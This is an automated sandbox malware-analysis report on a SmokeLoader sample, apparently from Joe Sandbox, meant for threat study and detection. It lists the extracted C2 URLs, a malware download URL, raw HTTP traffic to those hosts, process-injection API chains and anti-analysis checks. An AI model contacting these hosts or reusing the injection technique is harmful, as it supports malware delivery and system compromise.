Windows Analysis Report cf71PGrIPQ.exe

Overview

General Information

Sample Name: cf71PGrIPQ.exe
Analysis ID: 529748
MD5: 19b07bfa4ba4cffba03dff47a9efdf36
SHA1: 0629443d410c7ef3cdec3528c257022f4700d062
SHA256: 79c00db1607b8f07618ee3f90f5c4e160c7de05bce6380a7de83171e2eac11d4
Tags: exe, TeamBot

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • cf71PGrIPQ.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\cf71PGrIPQ.exe" MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
    • cf71PGrIPQ.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\cf71PGrIPQ.exe" MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • iaivaah (PID: 6324 cmdline: C:\Users\user\AppData\Roaming\iaivaah MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
    • iaivaah (PID: 6600 cmdline: C:\Users\user\AppData\Roaming\iaivaah MD5: 19B07BFA4BA4CFFBA03DFF47A9EFDF36)
  • cleanup
{
  "C2 list": [
    "http://host-data-coin-11.com/",
    "http://file-coin-host-12.com/"
  ]
}
Source | Rule | Description | Author | Strings
0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
Multi AV Scanner detection for submitted file
Source: cf71PGrIPQ.exe | Virustotal: Detection: 33%
Source: cf71PGrIPQ.exe | ReversingLabs: Detection: 47%
Antivirus detection for URL or domain
Source: http://privacytoolzforyou-7000.com/downloads/toolspab2.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: privacytoolzforyou-7000.com | Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\iaivaah | ReversingLabs: Detection: 47%
Machine Learning detection for sample
Source: cf71PGrIPQ.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\iaivaah | Joe Sandbox ML: detected
Source: cf71PGrIPQ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: C:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdb | source: cf71PGrIPQ.exe, iaivaah.13.dr
Source: Binary string: VC:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdbP+C | source: cf71PGrIPQ.exe, iaivaah.13.dr

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: privacytoolzforyou-7000.com
Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://host-data-coin-11.com/
Source: Malware configuration extractor | URLs: http://file-coin-host-12.com/
Source: Joe Sandbox View | ASN Name: ASBAXETNRU
Source: Joe Sandbox View | IP Address: 212.193.50.94
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx/1.20.1
  Date: Sun, 28 Nov 2021 04:09:32 GMT
  Content-Type: application/x-msdos-program
  Content-Length: 323584
  Connection: close
  Last-Modified: Sun, 28 Nov 2021 04:09:01 GMT
  ETag: "4f000-5d1d17bf688fe"
  Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://cyknc.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 233
  Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://sremv.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 326
  Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected:
  GET /downloads/toolspab2.exe HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: privacytoolzforyou-7000.com
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.20.1
  Date: Sun, 28 Nov 2021 04:08:56 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.20.1
  Date: Sun, 28 Nov 2021 04:09:04 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
Source: unknown | HTTP traffic detected:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://cyknc.net/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 233
  Host: host-data-coin-11.com
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: global traffic | HTTP traffic detected:
  GET /downloads/toolspab2.exe HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: privacytoolzforyou-7000.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match | File source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, type: MEMORY
Source: cf71PGrIPQ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00402A5F
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00402AB3
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_00402A5F
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_00402AB3
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 17_2_03283253
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 17_2_032831FF
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00402A5F
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00402AB3
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_00402A5F
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_00402B2E
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00401962 Sleep,NtTerminateProcess
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_0040196D Sleep,NtTerminateProcess
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00401A0B NtTerminateProcess
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00402491 NtOpenKey
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_00402084 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_00402491 NtOpenKey
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 17_2_03280110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00401962 Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_0040196D Sleep,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00401A0B NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00402084 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00402491 NtOpenKey
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_00402084 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_00402491 NtOpenKey
Source: cf71PGrIPQ.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: iaivaah.13.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: cf71PGrIPQ.exe | Virustotal: Detection: 33%
Source: cf71PGrIPQ.exe | ReversingLabs: Detection: 47%
Source: cf71PGrIPQ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe"
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Process created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaah
Source: C:\Users\user\AppData\Roaming\iaivaah | Process created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaah
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Process created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe"
Source: C:\Users\user\AppData\Roaming\iaivaah | Process created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaah
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\iaivaah
Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/2@3/1
Source: cf71PGrIPQ.exe | Static PE information: More than 200 imports for KERNEL32.dll
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cf71PGrIPQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdb | source: cf71PGrIPQ.exe, iaivaah.13.dr
Source: Binary string: VC:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdbP+C | source: cf71PGrIPQ.exe, iaivaah.13.dr
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00401880 push esi; iretd 6_2_00401893
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_2_00402E94 push es; iretd 6_2_00402EA0
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 6_1_00402E94 push es; iretd 6_1_00402EA0
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 17_2_03283634 push es; iretd 17_2_03283640
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00401880 push esi; iretd 21_2_00401893
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_2_00402E94 push es; iretd 21_2_00402EA0
Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_00402E94 push es; iretd 21_1_00402EA0
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 1_2_00420070 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: initial sample | Static PE information: section name: .text entropy: 7.03134441107
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\iaivaah

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation
Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\cf71pgripq.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\iaivaah:Zone.Identifier read attributes | delete

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iaivaah | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\explorer.exe TID: 7140 | Thread sleep count: 571 > 30
Source: C:\Windows\explorer.exe TID: 7152 | Thread sleep count: 368 > 30
Source: C:\Windows\explorer.exe TID: 7152 | Thread sleep time: -36800s >= -30000s
Source: C:\Windows\explorer.exe TID: 7160 | Thread sleep count: 424 > 30
Source: C:\Windows\explorer.exe TID: 7160 | Thread sleep time: -42400s >= -30000s
Source: C:\Windows\explorer.exe TID: 6780 | Thread sleep count: 463 > 30
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 571
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 368
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 424
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 463
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | System information queried: ModuleInformation
Source: explorer.exe, 0000000D.00000000.333687943.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.306993482.000000000EF02000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}soft.Wi
Source: explorer.exe, 0000000D.00000000.318537483.0000000008778000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 0000000D.00000000.333687943.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 0000000D.00000000.328908801.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000D.00000000.328908801.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 0000000D.00000000.333687943.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

            Anti Debugging:

            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | System information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\iaivaah | System information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 1_2_0041FE40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 1_2_00420070 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
            Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 17_2_03280042 push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\iaivaah | Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 21_1_004027ED LdrLoadDll
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 1_2_0041DF00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\explorer.exe | File created: iaivaah.13.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: privacytoolzforyou-7000.com
            Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\iaivaah | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\iaivaah | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\iaivaah | Memory written: C:\Users\user\AppData\Roaming\iaivaah base: 400000 value starts with: 4D5A
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\AppData\Roaming\iaivaah | Code function: 17_2_03280110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Thread created: C:\Windows\explorer.exe EIP: 4DE1930
            Source: C:\Users\user\AppData\Roaming\iaivaah | Thread created: unknown EIP: 5AC1930
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Process created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Source: C:\Users\user\AppData\Roaming\iaivaah | Process created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaah
            Source: explorer.exe, 0000000D.00000000.310917230.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.298771642.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.324809023.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.328709611.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 0000000D.00000000.303486608.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.334192624.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.318537483.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exe | Code function: 1_2_00417FA0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter

            Stealing of Sensitive Information:

            Yara detected SmokeLoader
            Source: Yara match | File source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected SmokeLoader
            Source: Yara match | File source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
